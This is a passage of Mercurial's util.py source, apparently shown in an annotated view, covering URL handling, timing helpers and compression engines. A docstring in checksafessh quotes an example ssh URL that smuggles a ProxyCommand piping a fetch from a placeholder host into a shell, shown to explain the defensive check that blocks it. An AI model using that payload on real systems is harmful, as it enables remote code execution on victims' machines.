2900 2900 >>> bytes(url(b'bundle://../foo'))
2901 2901 'bundle:../foo'
2902 2902 >>> bytes(url(b'path'))
2903 2903 'path'
2904 2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 2905 'file:///tmp/foo/bar'
2906 2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 2907 'file:///c:/tmp/foo/bar'
2908 2908 >>> print(url(br'bundle:foo\bar'))
2909 2909 bundle:foo\bar
2910 2910 >>> print(url(br'file:///D:\data\hg'))
2911 2911 file:///D:\data\hg
2912 2912 """
2913 2913 if self._localpath:
2914 2914 s = self.path
2915 2915 if self.scheme == 'bundle':
2916 2916 s = 'bundle:' + s
2917 2917 if self.fragment:
2918 2918 s += '#' + self.fragment
2919 2919 return s
2920 2920
2921 2921 s = self.scheme + ':'
2922 2922 if self.user or self.passwd or self.host:
2923 2923 s += '//'
2924 2924 elif self.scheme and (not self.path or self.path.startswith('/')
2925 2925 or hasdriveletter(self.path)):
2926 2926 s += '//'
2927 2927 if hasdriveletter(self.path):
2928 2928 s += '/'
2929 2929 if self.user:
2930 2930 s += urlreq.quote(self.user, safe=self._safechars)
2931 2931 if self.passwd:
2932 2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 2933 if self.user or self.passwd:
2934 2934 s += '@'
2935 2935 if self.host:
2936 2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 2937 s += urlreq.quote(self.host)
2938 2938 else:
2939 2939 s += self.host
2940 2940 if self.port:
2941 2941 s += ':' + urlreq.quote(self.port)
2942 2942 if self.host:
2943 2943 s += '/'
2944 2944 if self.path:
2945 2945 # TODO: similar to the query string, we should not unescape the
2946 2946 # path when we store it, the path might contain '%2f' = '/',
2947 2947 # which we should *not* escape.
2948 2948 s += urlreq.quote(self.path, safe=self._safepchars)
2949 2949 if self.query:
2950 2950 # we store the query in escaped form.
2951 2951 s += '?' + self.query
2952 2952 if self.fragment is not None:
2953 2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 2954 return s
2955 2955
2956 2956 __str__ = encoding.strmethod(__bytes__)
2957 2957
2958 2958 def authinfo(self):
2959 2959 user, passwd = self.user, self.passwd
2960 2960 try:
2961 2961 self.user, self.passwd = None, None
2962 2962 s = bytes(self)
2963 2963 finally:
2964 2964 self.user, self.passwd = user, passwd
2965 2965 if not self.user:
2966 2966 return (s, None)
2967 2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 2968 # URIs must not contain credentials. The host is passed in the
2969 2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 2970 # a password.
2971 2971 return (s, (None, (s, self.host),
2972 2972 self.user, self.passwd or ''))
2973 2973
2974 2974 def isabs(self):
2975 2975 if self.scheme and self.scheme != 'file':
2976 2976 return True # remote URL
2977 2977 if hasdriveletter(self.path):
2978 2978 return True # absolute for our purposes - can't be joined()
2979 2979 if self.path.startswith(br'\\'):
2980 2980 return True # Windows UNC path
2981 2981 if self.path.startswith('/'):
2982 2982 return True # POSIX-style
2983 2983 return False
2984 2984
2985 2985 def localpath(self):
2986 2986 if self.scheme == 'file' or self.scheme == 'bundle':
2987 2987 path = self.path or '/'
2988 2988 # For Windows, we need to promote hosts containing drive
2989 2989 # letters to paths with drive letters.
2990 2990 if hasdriveletter(self._hostport):
2991 2991 path = self._hostport + '/' + self.path
2992 2992 elif (self.host is not None and self.path
2993 2993 and not hasdriveletter(path)):
2994 2994 path = '/' + path
2995 2995 return path
2996 2996 return self._origpath
2997 2997
2998 2998 def islocal(self):
2999 2999 '''whether localpath will return something that posixfile can open'''
3000 3000 return (not self.scheme or self.scheme == 'file'
3001 3001 or self.scheme == 'bundle')
3002 3002
3003 3003 def hasscheme(path):
3004 3004 return bool(url(path).scheme)
3005 3005
3006 3006 def hasdriveletter(path):
3007 3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3008 3008
3009 3009 def urllocalpath(path):
3010 3010 return url(path, parsequery=False, parsefragment=False).localpath()
3011 3011
3012 3012 def checksafessh(path):
3013 3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014 3014
3015 3015 This is a sanity check for ssh urls. ssh will parse the first item as
3016 3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 3017 Let's prevent these potentially exploited urls entirely and warn the
3018 3018 user.
3019 3019
3020 3020 Raises an error.Abort when the url is unsafe.
3021 3021 """
3022 3022 path = urlreq.unquote(path)
3023 3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 3024 raise error.Abort(_('potentially unsafe url: %r') %
3025 3025 (path,))
3026 3026
3027 3027 def hidepassword(u):
3028 3028 '''hide user credential in a url string'''
3029 3029 u = url(u)
3030 3030 if u.passwd:
3031 3031 u.passwd = '***'
3032 3032 return bytes(u)
3033 3033
3034 3034 def removeauth(u):
3035 3035 '''remove all authentication information from a url string'''
3036 3036 u = url(u)
3037 3037 u.user = u.passwd = None
3038 3038 return str(u)
3039 3039
3040 3040 timecount = unitcountfn(
3041 3041 (1, 1e3, _('%.0f s')),
3042 3042 (100, 1, _('%.1f s')),
3043 3043 (10, 1, _('%.2f s')),
3044 3044 (1, 1, _('%.3f s')),
3045 3045 (100, 0.001, _('%.1f ms')),
3046 3046 (10, 0.001, _('%.2f ms')),
3047 3047 (1, 0.001, _('%.3f ms')),
3048 3048 (100, 0.000001, _('%.1f us')),
3049 3049 (10, 0.000001, _('%.2f us')),
3050 3050 (1, 0.000001, _('%.3f us')),
3051 3051 (100, 0.000000001, _('%.1f ns')),
3052 3052 (10, 0.000000001, _('%.2f ns')),
3053 3053 (1, 0.000000001, _('%.3f ns')),
3054 3054 )
3055 3055
3056 3056 _timenesting = [0]
3057 3057
3058 3058 def timed(func):
3059 3059 '''Report the execution time of a function call to stderr.
3060 3060
3061 3061 During development, use as a decorator when you need to measure
3062 3062 the cost of a function, e.g. as follows:
3063 3063
3064 3064 @util.timed
3065 3065 def foo(a, b, c):
3066 3066 pass
3067 3067 '''
3068 3068
3069 3069 def wrapper(*args, **kwargs):
3070 3070 start = timer()
3071 3071 indent = 2
3072 3072 _timenesting[0] += indent
3073 3073 try:
3074 3074 return func(*args, **kwargs)
3075 3075 finally:
3076 3076 elapsed = timer() - start
3077 3077 _timenesting[0] -= indent
3078 3078 stderr.write('%s%s: %s\n' %
3079 3079 (' ' * _timenesting[0], func.__name__,
3080 3080 timecount(elapsed)))
3081 3081 return wrapper
3082 3082
3083 3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085 3085
3086 3086 def sizetoint(s):
3087 3087 '''Convert a space specifier to a byte count.
3088 3088
3089 3089 >>> sizetoint(b'30')
3090 3090 30
3091 3091 >>> sizetoint(b'2.2kb')
3092 3092 2252
3093 3093 >>> sizetoint(b'6M')
3094 3094 6291456
3095 3095 '''
3096 3096 t = s.strip().lower()
3097 3097 try:
3098 3098 for k, u in _sizeunits:
3099 3099 if t.endswith(k):
3100 3100 return int(float(t[:-len(k)]) * u)
3101 3101 return int(t)
3102 3102 except ValueError:
3103 3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3104 3104
3105 3105 class hooks(object):
3106 3106 '''A collection of hook functions that can be used to extend a
3107 3107 function's behavior. Hooks are called in lexicographic order,
3108 3108 based on the names of their sources.'''
3109 3109
3110 3110 def __init__(self):
3111 3111 self._hooks = []
3112 3112
3113 3113 def add(self, source, hook):
3114 3114 self._hooks.append((source, hook))
3115 3115
3116 3116 def __call__(self, *args):
3117 3117 self._hooks.sort(key=lambda x: x[0])
3118 3118 results = []
3119 3119 for source, hook in self._hooks:
3120 3120 results.append(hook(*args))
3121 3121 return results
3122 3122
3123 3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 3124 '''Yields lines for a nicely formatted stacktrace.
3125 3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3126 3126 Each file+linenumber is formatted according to fileline.
3127 3127 Each line is formatted according to line.
3128 3128 If line is None, it yields:
3129 3129 length of longest filepath+line number,
3130 3130 filepath+linenumber,
3131 3131 function
3132 3132
3133 3133 Not be used in production code but very convenient while developing.
3134 3134 '''
3135 3135 entries = [(fileline % (fn, ln), func)
3136 3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 3137 ][-depth:]
3138 3138 if entries:
3139 3139 fnmax = max(len(entry[0]) for entry in entries)
3140 3140 for fnln, func in entries:
3141 3141 if line is None:
3142 3142 yield (fnmax, fnln, func)
3143 3143 else:
3144 3144 yield line % (fnmax, fnln, func)
3145 3145
3146 3146 def debugstacktrace(msg='stacktrace', skip=0,
3147 3147 f=stderr, otherf=stdout, depth=0):
3148 3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3150 3150 By default it will flush stdout first.
3151 3151 It can be used everywhere and intentionally does not require an ui object.
3152 3152 Not be used in production code but very convenient while developing.
3153 3153 '''
3154 3154 if otherf:
3155 3155 otherf.flush()
3156 3156 f.write('%s at:\n' % msg.rstrip())
3157 3157 for line in getstackframes(skip + 1, depth=depth):
3158 3158 f.write(line)
3159 3159 f.flush()
3160 3160
3161 3161 class dirs(object):
3162 3162 '''a multiset of directory names from a dirstate or manifest'''
3163 3163
3164 3164 def __init__(self, map, skip=None):
3165 3165 self._dirs = {}
3166 3166 addpath = self.addpath
3167 3167 if safehasattr(map, 'iteritems') and skip is not None:
3168 3168 for f, s in map.iteritems():
3169 3169 if s[0] != skip:
3170 3170 addpath(f)
3171 3171 else:
3172 3172 for f in map:
3173 3173 addpath(f)
3174 3174
3175 3175 def addpath(self, path):
3176 3176 dirs = self._dirs
3177 3177 for base in finddirs(path):
3178 3178 if base in dirs:
3179 3179 dirs[base] += 1
3180 3180 return
3181 3181 dirs[base] = 1
3182 3182
3183 3183 def delpath(self, path):
3184 3184 dirs = self._dirs
3185 3185 for base in finddirs(path):
3186 3186 if dirs[base] > 1:
3187 3187 dirs[base] -= 1
3188 3188 return
3189 3189 del dirs[base]
3190 3190
3191 3191 def __iter__(self):
3192 3192 return iter(self._dirs)
3193 3193
3194 3194 def __contains__(self, d):
3195 3195 return d in self._dirs
3196 3196
3197 3197 if safehasattr(parsers, 'dirs'):
3198 3198 dirs = parsers.dirs
3199 3199
3200 3200 def finddirs(path):
3201 3201 pos = path.rfind('/')
3202 3202 while pos != -1:
3203 3203 yield path[:pos]
3204 3204 pos = path.rfind('/', 0, pos)
3205 3205
3206 3206 # compression code
3207 3207
3208 3208 SERVERROLE = 'server'
3209 3209 CLIENTROLE = 'client'
3210 3210
3211 3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 3212 (u'name', u'serverpriority',
3213 3213 u'clientpriority'))
3214 3214
3215 3215 class compressormanager(object):
3216 3216 """Holds registrations of various compression engines.
3217 3217
3218 3218 This class essentially abstracts the differences between compression
3219 3219 engines to allow new compression formats to be added easily, possibly from
3220 3220 extensions.
3221 3221
3222 3222 Compressors are registered against the global instance by calling its
3223 3223 ``register()`` method.
3224 3224 """
3225 3225 def __init__(self):
3226 3226 self._engines = {}
3227 3227 # Bundle spec human name to engine name.
3228 3228 self._bundlenames = {}
3229 3229 # Internal bundle identifier to engine name.
3230 3230 self._bundletypes = {}
3231 3231 # Revlog header to engine name.
3232 3232 self._revlogheaders = {}
3233 3233 # Wire proto identifier to engine name.
3234 3234 self._wiretypes = {}
3235 3235
3236 3236 def __getitem__(self, key):
3237 3237 return self._engines[key]
3238 3238
3239 3239 def __contains__(self, key):
3240 3240 return key in self._engines
3241 3241
3242 3242 def __iter__(self):
3243 3243 return iter(self._engines.keys())
3244 3244
3245 3245 def register(self, engine):
3246 3246 """Register a compression engine with the manager.
3247 3247
3248 3248 The argument must be a ``compressionengine`` instance.
3249 3249 """
3250 3250 if not isinstance(engine, compressionengine):
3251 3251 raise ValueError(_('argument must be a compressionengine'))
3252 3252
3253 3253 name = engine.name()
3254 3254
3255 3255 if name in self._engines:
3256 3256 raise error.Abort(_('compression engine %s already registered') %
3257 3257 name)
3258 3258
3259 3259 bundleinfo = engine.bundletype()
3260 3260 if bundleinfo:
3261 3261 bundlename, bundletype = bundleinfo
3262 3262
3263 3263 if bundlename in self._bundlenames:
3264 3264 raise error.Abort(_('bundle name %s already registered') %
3265 3265 bundlename)
3266 3266 if bundletype in self._bundletypes:
3267 3267 raise error.Abort(_('bundle type %s already registered by %s') %
3268 3268 (bundletype, self._bundletypes[bundletype]))
3269 3269
3270 3270 # No external facing name declared.
3271 3271 if bundlename:
3272 3272 self._bundlenames[bundlename] = name
3273 3273
3274 3274 self._bundletypes[bundletype] = name
3275 3275
3276 3276 wiresupport = engine.wireprotosupport()
3277 3277 if wiresupport:
3278 3278 wiretype = wiresupport.name
3279 3279 if wiretype in self._wiretypes:
3280 3280 raise error.Abort(_('wire protocol compression %s already '
3281 3281 'registered by %s') %
3282 3282 (wiretype, self._wiretypes[wiretype]))
3283 3283
3284 3284 self._wiretypes[wiretype] = name
3285 3285
3286 3286 revlogheader = engine.revlogheader()
3287 3287 if revlogheader and revlogheader in self._revlogheaders:
3288 3288 raise error.Abort(_('revlog header %s already registered by %s') %
3289 3289 (revlogheader, self._revlogheaders[revlogheader]))
3290 3290
3291 3291 if revlogheader:
3292 3292 self._revlogheaders[revlogheader] = name
3293 3293
3294 3294 self._engines[name] = engine
3295 3295
3296 3296 @property
3297 3297 def supportedbundlenames(self):
3298 3298 return set(self._bundlenames.keys())
3299 3299
3300 3300 @property
3301 3301 def supportedbundletypes(self):
3302 3302 return set(self._bundletypes.keys())
3303 3303
3304 3304 def forbundlename(self, bundlename):
3305 3305 """Obtain a compression engine registered to a bundle name.
3306 3306
3307 3307 Will raise KeyError if the bundle type isn't registered.
3308 3308
3309 3309 Will abort if the engine is known but not available.
3310 3310 """
3311 3311 engine = self._engines[self._bundlenames[bundlename]]
3312 3312 if not engine.available():
3313 3313 raise error.Abort(_('compression engine %s could not be loaded') %
3314 3314 engine.name())
3315 3315 return engine
3316 3316
3317 3317 def forbundletype(self, bundletype):
3318 3318 """Obtain a compression engine registered to a bundle type.
3319 3319
3320 3320 Will raise KeyError if the bundle type isn't registered.
3321 3321
3322 3322 Will abort if the engine is known but not available.
3323 3323 """
3324 3324 engine = self._engines[self._bundletypes[bundletype]]
3325 3325 if not engine.available():
3326 3326 raise error.Abort(_('compression engine %s could not be loaded') %
3327 3327 engine.name())
3328 3328 return engine
3329 3329
3330 3330 def supportedwireengines(self, role, onlyavailable=True):
3331 3331 """Obtain compression engines that support the wire protocol.
3332 3332
3333 3333 Returns a list of engines in prioritized order, most desired first.
3334 3334
3335 3335 If ``onlyavailable`` is set, filter out engines that can't be
3336 3336 loaded.
3337 3337 """
3338 3338 assert role in (SERVERROLE, CLIENTROLE)
3339 3339
3340 3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3341 3341
3342 3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3343 3343 if onlyavailable:
3344 3344 engines = [e for e in engines if e.available()]
3345 3345
3346 3346 def getkey(e):
3347 3347 # Sort first by priority, highest first. In case of tie, sort
3348 3348 # alphabetically. This is arbitrary, but ensures output is
3349 3349 # stable.
3350 3350 w = e.wireprotosupport()
3351 3351 return -1 * getattr(w, attr), w.name
3352 3352
3353 3353 return list(sorted(engines, key=getkey))
3354 3354
3355 3355 def forwiretype(self, wiretype):
3356 3356 engine = self._engines[self._wiretypes[wiretype]]
3357 3357 if not engine.available():
3358 3358 raise error.Abort(_('compression engine %s could not be loaded') %
3359 3359 engine.name())
3360 3360 return engine
3361 3361
3362 3362 def forrevlogheader(self, header):
3363 3363 """Obtain a compression engine registered to a revlog header.
3364 3364
3365 3365 Will raise KeyError if the revlog header value isn't registered.
3366 3366 """
3367 3367 return self._engines[self._revlogheaders[header]]
3368 3368
3369 3369 compengines = compressormanager()
3370 3370
3371 3371 class compressionengine(object):
3372 3372 """Base class for compression engines.
3373 3373
3374 3374 Compression engines must implement the interface defined by this class.
3375 3375 """
3376 3376 def name(self):
3377 3377 """Returns the name of the compression engine.
3378 3378
3379 3379 This is the key the engine is registered under.
3380 3380
3381 3381 This method must be implemented.
3382 3382 """
3383 3383 raise NotImplementedError()
3384 3384
3385 3385 def available(self):
3386 3386 """Whether the compression engine is available.
3387 3387
3388 3388 The intent of this method is to allow optional compression engines
3389 3389 that may not be available in all installations (such as engines relying
3390 3390 on C extensions that may not be present).
3391 3391 """
3392 3392 return True
3393 3393
3394 3394 def bundletype(self):
3395 3395 """Describes bundle identifiers for this engine.
3396 3396
3397 3397 If this compression engine isn't supported for bundles, returns None.
3398 3398
3399 3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 3400 the user-facing "bundle spec" compression name and an internal
3401 3401 identifier used to denote the compression format within bundles. To
3402 3402 exclude the name from external usage, set the first element to ``None``.
3403 3403
3404 3404 If bundle compression is supported, the class must also implement
3405 3405 ``compressstream`` and `decompressorreader``.
3406 3406
3407 3407 The docstring of this method is used in the help system to tell users
3408 3408 about this engine.
3409 3409 """
3410 3410 return None
3411 3411
3412 3412 def wireprotosupport(self):
3413 3413 """Declare support for this compression format on the wire protocol.
3414 3414
3415 3415 If this compression engine isn't supported for compressing wire
3416 3416 protocol payloads, returns None.
3417 3417
3418 3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 3419 fields:
3420 3420
3421 3421 * String format identifier
3422 3422 * Integer priority for the server
3423 3423 * Integer priority for the client
3424 3424
3425 3425 The integer priorities are used to order the advertisement of format
3426 3426 support by server and client. The highest integer is advertised
3427 3427 first. Integers with non-positive values aren't advertised.
3428 3428
3429 3429 The priority values are somewhat arbitrary and only used for default
3430 3430 ordering. The relative order can be changed via config options.
3431 3431
3432 3432 If wire protocol compression is supported, the class must also implement
3433 3433 ``compressstream`` and ``decompressorreader``.
3434 3434 """
3435 3435 return None
3436 3436
3437 3437 def revlogheader(self):
3438 3438 """Header added to revlog chunks that identifies this engine.
3439 3439
3440 3440 If this engine can be used to compress revlogs, this method should
3441 3441 return the bytes used to identify chunks compressed with this engine.
3442 3442 Else, the method should return ``None`` to indicate it does not
3443 3443 participate in revlog compression.
3444 3444 """
3445 3445 return None
3446 3446
3447 3447 def compressstream(self, it, opts=None):
3448 3448 """Compress an iterator of chunks.
3449 3449
3450 3450 The method receives an iterator (ideally a generator) of chunks of
3451 3451 bytes to be compressed. It returns an iterator (ideally a generator)
3452 3452 of bytes of chunks representing the compressed output.
3453 3453
3454 3454 Optionally accepts an argument defining how to perform compression.
3455 3455 Each engine treats this argument differently.
3456 3456 """
3457 3457 raise NotImplementedError()
3458 3458
3459 3459 def decompressorreader(self, fh):
3460 3460 """Perform decompression on a file object.
3461 3461
3462 3462 Argument is an object with a ``read(size)`` method that returns
3463 3463 compressed data. Return value is an object with a ``read(size)`` that
3464 3464 returns uncompressed data.
3465 3465 """
3466 3466 raise NotImplementedError()
3467 3467
3468 3468 def revlogcompressor(self, opts=None):
3469 3469 """Obtain an object that can be used to compress revlog entries.
3470 3470
3471 3471 The object has a ``compress(data)`` method that compresses binary
3472 3472 data. This method returns compressed binary data or ``None`` if
3473 3473 the data could not be compressed (too small, not compressible, etc).
3474 3474 The returned data should have a header uniquely identifying this
3475 3475 compression format so decompression can be routed to this engine.
3476 3476 This header should be identified by the ``revlogheader()`` return
3477 3477 value.
3478 3478
3479 3479 The object has a ``decompress(data)`` method that decompresses
3480 3480 data. The method will only be called if ``data`` begins with
3481 3481 ``revlogheader()``. The method should return the raw, uncompressed
3482 3482 data or raise a ``RevlogError``.
3483 3483
3484 3484 The object is reusable but is not thread safe.
3485 3485 """
3486 3486 raise NotImplementedError()
3487 3487
3488 3488 class _zlibengine(compressionengine):
3489 3489 def name(self):
3490 3490 return 'zlib'
3491 3491
3492 3492 def bundletype(self):
3493 3493 """zlib compression using the DEFLATE algorithm.
3494 3494
3495 3495 All Mercurial clients should support this format. The compression
3496 3496 algorithm strikes a reasonable balance between compression ratio
3497 3497 and size.
3498 3498 """
3499 3499 return 'gzip', 'GZ'
3500 3500
3501 3501 def wireprotosupport(self):
3502 3502 return compewireprotosupport('zlib', 20, 20)
3503 3503
3504 3504 def revlogheader(self):
3505 3505 return 'x'
3506 3506
3507 3507 def compressstream(self, it, opts=None):
3508 3508 opts = opts or {}
3509 3509
3510 3510 z = zlib.compressobj(opts.get('level', -1))
3511 3511 for chunk in it:
3512 3512 data = z.compress(chunk)
3513 3513 # Not all calls to compress emit data. It is cheaper to inspect
3514 3514 # here than to feed empty chunks through generator.
3515 3515 if data:
3516 3516 yield data
3517 3517
3518 3518 yield z.flush()
3519 3519
3520 3520 def decompressorreader(self, fh):
3521 3521 def gen():
3522 3522 d = zlib.decompressobj()
3523 3523 for chunk in filechunkiter(fh):
3524 3524 while chunk:
3525 3525 # Limit output size to limit memory.
3526 3526 yield d.decompress(chunk, 2 ** 18)
3527 3527 chunk = d.unconsumed_tail
3528 3528
3529 3529 return chunkbuffer(gen())
3530 3530
3531 3531 class zlibrevlogcompressor(object):
3532 3532 def compress(self, data):
3533 3533 insize = len(data)
3534 3534 # Caller handles empty input case.
3535 3535 assert insize > 0
3536 3536
3537 3537 if insize < 44:
3538 3538 return None
3539 3539
3540 3540 elif insize <= 1000000:
3541 3541 compressed = zlib.compress(data)
3542 3542 if len(compressed) < insize:
3543 3543 return compressed
3544 3544 return None
3545 3545
3546 3546 # zlib makes an internal copy of the input buffer, doubling
3547 3547 # memory usage for large inputs. So do streaming compression
3548 3548 # on large inputs.
3549 3549 else:
3550 3550 z = zlib.compressobj()
3551 3551 parts = []
3552 3552 pos = 0
3553 3553 while pos < insize:
3554 3554 pos2 = pos + 2**20
3555 3555 parts.append(z.compress(data[pos:pos2]))
3556 3556 pos = pos2
3557 3557 parts.append(z.flush())
3558 3558
3559 3559 if sum(map(len, parts)) < insize:
3560 3560 return ''.join(parts)
3561 3561 return None
3562 3562
3563 3563 def decompress(self, data):
3564 3564 try:
3565 3565 return zlib.decompress(data)
3566 3566 except zlib.error as e:
3567 3567 raise error.RevlogError(_('revlog decompress error: %s') %
3568 3568 str(e))
3569 3569
3570 3570 def revlogcompressor(self, opts=None):
3571 3571 return self.zlibrevlogcompressor()
3572 3572
3573 3573 compengines.register(_zlibengine())
3574 3574
3575 3575 class _bz2engine(compressionengine):
3576 3576 def name(self):
3577 3577 return 'bz2'
3578 3578
3579 3579 def bundletype(self):
3580 3580 """An algorithm that produces smaller bundles than ``gzip``.
3581 3581
3582 3582 All Mercurial clients should support this format.
3583 3583
3584 3584 This engine will likely produce smaller bundles than ``gzip`` but
3585 3585 will be significantly slower, both during compression and
3586 3586 decompression.
3587 3587
3588 3588 If available, the ``zstd`` engine can yield similar or better
3589 3589 compression at much higher speeds.
3590 3590 """
3591 3591 return 'bzip2', 'BZ'
3592 3592
3593 3593 # We declare a protocol name but don't advertise by default because
3594 3594 # it is slow.
3595 3595 def wireprotosupport(self):
3596 3596 return compewireprotosupport('bzip2', 0, 0)
3597 3597
3598 3598 def compressstream(self, it, opts=None):
3599 3599 opts = opts or {}
3600 3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3601 3601 for chunk in it:
3602 3602 data = z.compress(chunk)
3603 3603 if data:
3604 3604 yield data
3605 3605
3606 3606 yield z.flush()
3607 3607
3608 3608 def decompressorreader(self, fh):
3609 3609 def gen():
3610 3610 d = bz2.BZ2Decompressor()
3611 3611 for chunk in filechunkiter(fh):
3612 3612 yield d.decompress(chunk)
3613 3613
3614 3614 return chunkbuffer(gen())
3615 3615
3616 3616 compengines.register(_bz2engine())
3617 3617
3618 3618 class _truncatedbz2engine(compressionengine):
3619 3619 def name(self):
3620 3620 return 'bz2truncated'
3621 3621
3622 3622 def bundletype(self):
3623 3623 return None, '_truncatedBZ'
3624 3624
3625 3625 # We don't implement compressstream because it is hackily handled elsewhere.
3626 3626
3627 3627 def decompressorreader(self, fh):
3628 3628 def gen():
3629 3629 # The input stream doesn't have the 'BZ' header. So add it back.
3630 3630 d = bz2.BZ2Decompressor()
3631 3631 d.decompress('BZ')
3632 3632 for chunk in filechunkiter(fh):
3633 3633 yield d.decompress(chunk)
3634 3634
3635 3635 return chunkbuffer(gen())
3636 3636
3637 3637 compengines.register(_truncatedbz2engine())
3638 3638
3639 3639 class _noopengine(compressionengine):
3640 3640 def name(self):
3641 3641 return 'none'
3642 3642
3643 3643 def bundletype(self):
3644 3644 """No compression is performed.
3645 3645
3646 3646 Use this compression engine to explicitly disable compression.
3647 3647 """
3648 3648 return 'none', 'UN'
3649 3649
3650 3650 # Clients always support uncompressed payloads. Servers don't because
3651 3651 # unless you are on a fast network, uncompressed payloads can easily
3652 3652 # saturate your network pipe.
3653 3653 def wireprotosupport(self):
3654 3654 return compewireprotosupport('none', 0, 10)
3655 3655
3656 3656 # We don't implement revlogheader because it is handled specially
3657 3657 # in the revlog class.
3658 3658
3659 3659 def compressstream(self, it, opts=None):
3660 3660 return it
3661 3661
3662 3662 def decompressorreader(self, fh):
3663 3663 return fh
3664 3664
3665 3665 class nooprevlogcompressor(object):
3666 3666 def compress(self, data):
3667 3667 return None
3668 3668
3669 3669 def revlogcompressor(self, opts=None):
3670 3670 return self.nooprevlogcompressor()
3671 3671
3672 3672 compengines.register(_noopengine())
3673 3673
3674 3674 class _zstdengine(compressionengine):
3675 3675 def name(self):
3676 3676 return 'zstd'
3677 3677
3678 3678 @propertycache
3679 3679 def _module(self):
3680 3680 # Not all installs have the zstd module available. So defer importing
3681 3681 # until first access.
3682 3682 try:
3683 3683 from . import zstd
3684 3684 # Force delayed import.
3685 3685 zstd.__version__
3686 3686 return zstd
3687 3687 except ImportError:
3688 3688 return None
3689 3689
3690 3690 def available(self):
3691 3691 return bool(self._module)
3692 3692
3693 3693 def bundletype(self):
3694 3694 """A modern compression algorithm that is fast and highly flexible.
3695 3695
3696 3696 Only supported by Mercurial 4.1 and newer clients.
3697 3697
3698 3698 With the default settings, zstd compression is both faster and yields
3699 3699 better compression than ``gzip``. It also frequently yields better
3700 3700 compression than ``bzip2`` while operating at much higher speeds.
3701 3701
3702 3702 If this engine is available and backwards compatibility is not a
3703 3703 concern, it is likely the best available engine.
3704 3704 """
3705 3705 return 'zstd', 'ZS'
3706 3706
3707 3707 def wireprotosupport(self):
3708 3708 return compewireprotosupport('zstd', 50, 50)
3709 3709
3710 3710 def revlogheader(self):
3711 3711 return '\x28'
3712 3712
3713 3713 def compressstream(self, it, opts=None):
3714 3714 opts = opts or {}
3715 3715 # zstd level 3 is almost always significantly faster than zlib
3716 3716 # while providing no worse compression. It strikes a good balance
3717 3717 # between speed and compression.
3718 3718 level = opts.get('level', 3)
3719 3719
3720 3720 zstd = self._module
3721 3721 z = zstd.ZstdCompressor(level=level).compressobj()
3722 3722 for chunk in it:
3723 3723 data = z.compress(chunk)
3724 3724 if data:
3725 3725 yield data
3726 3726
3727 3727 yield z.flush()
3728 3728
3729 3729 def decompressorreader(self, fh):
3730 3730 zstd = self._module
3731 3731 dctx = zstd.ZstdDecompressor()
3732 3732 return chunkbuffer(dctx.read_from(fh))
3733 3733
3734 3734 class zstdrevlogcompressor(object):
3735 3735 def __init__(self, zstd, level=3):
3736 3736 # Writing the content size adds a few bytes to the output. However,
3737 3737 # it allows decompression to be more optimal since we can
3738 3738 # pre-allocate a buffer to hold the result.
3739 3739 self._cctx = zstd.ZstdCompressor(level=level,
3740 3740 write_content_size=True)
3741 3741 self._dctx = zstd.ZstdDecompressor()
3742 3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3743 3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3744 3744
3745 3745 def compress(self, data):
3746 3746 insize = len(data)
3747 3747 # Caller handles empty input case.
3748 3748 assert insize > 0
3749 3749
3750 3750 if insize < 50:
3751 3751 return None
3752 3752
3753 3753 elif insize <= 1000000:
3754 3754 compressed = self._cctx.compress(data)
3755 3755 if len(compressed) < insize:
3756 3756 return compressed
3757 3757 return None
3758 3758 else:
3759 3759 z = self._cctx.compressobj()
3760 3760 chunks = []
3761 3761 pos = 0
3762 3762 while pos < insize:
3763 3763 pos2 = pos + self._compinsize
3764 3764 chunk = z.compress(data[pos:pos2])
3765 3765 if chunk:
3766 3766 chunks.append(chunk)
3767 3767 pos = pos2
3768 3768 chunks.append(z.flush())
3769 3769
3770 3770 if sum(map(len, chunks)) < insize:
3771 3771 return ''.join(chunks)
3772 3772 return None
3773 3773
3774 3774 def decompress(self, data):
3775 3775 insize = len(data)
3776 3776
3777 3777 try:
3778 3778 # This was measured to be faster than other streaming
3779 3779 # decompressors.
3780 3780 dobj = self._dctx.decompressobj()
3781 3781 chunks = []
3782 3782 pos = 0
3783 3783 while pos < insize:
3784 3784 pos2 = pos + self._decompinsize
3785 3785 chunk = dobj.decompress(data[pos:pos2])
3786 3786 if chunk:
3787 3787 chunks.append(chunk)
3788 3788 pos = pos2
3789 3789 # Frame should be exhausted, so no finish() API.
3790 3790
3791 3791 return ''.join(chunks)
3792 3792 except Exception as e:
3793 3793 raise error.RevlogError(_('revlog decompress error: %s') %
3794 3794 str(e))
3795 3795
3796 3796 def revlogcompressor(self, opts=None):
3797 3797 opts = opts or {}
3798 3798 return self.zstdrevlogcompressor(self._module,
3799 3799 level=opts.get('level', 3))
3800 3800
3801 3801 compengines.register(_zstdengine())
3802 3802
3803 3803 def bundlecompressiontopics():
3804 3804 """Obtains a list of available bundle compressions for use in help."""
3805 3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3806 3806 items = {}
3807 3807
